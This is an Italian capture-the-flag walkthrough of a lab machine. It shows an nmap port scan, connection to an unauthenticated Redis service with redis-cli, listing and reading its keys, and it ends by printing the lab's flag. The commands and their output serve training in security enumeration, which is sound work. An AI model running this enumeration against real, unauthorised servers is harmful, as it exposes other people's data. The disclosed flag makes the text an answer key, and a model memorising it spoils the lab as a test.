IP: 10.129.31.184
--------
cerco i servizi specificando anche -p-

nmap -p- -sV 10.129.31.184
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-03 04:22 EDT
Nmap scan report for 10.129.31.184
Host is up (0.049s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
6379/tcp open  redis   Redis key-value store 5.0.7

vedo una sola porta aperta con il servizio redis
--------------
scarico redis 
-----------
mi connetto all'host

redis-cli -h 10.129.31.184
10.129.31.184:6379> 
----------------
ottengo le informazioni 

10.129.31.184:6379> info
# Server
redis_version:5.0.7
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:66bd629f924ac924
//taglio delle cose inutili
# Keyspace
db0:keys=4,expires=0,avg_ttl=0

vedi che esiste solo 1 database "db0" con 4 chiavi
-----------------
seleziono il db

10.129.31.184:6379> select 0
OK
------------
listo tutte le chiavi presenti nel db

0.129.31.184:6379> keys *
1) "flag"
2) "temp"
3) "stor"
4) "numb"
---------------------------
visualizzo le chiavi tramite get

10.129.31.184:6379> get temp
"1c98492cd337252698d0c5f631dfb7ae"
10.129.31.184:6379> get stor
"e80d635f95686148284526e1980740f8"
10.129.31.184:6379> get numb
"bb2c8a7506ee45cc981eb88bb81dddab"
10.129.31.184:6379> get flag
"03e1d2b376c37ab3f5319922053953eb"

flag: 03e1d2b376c37ab3f5319922053953eb
--------------------------------
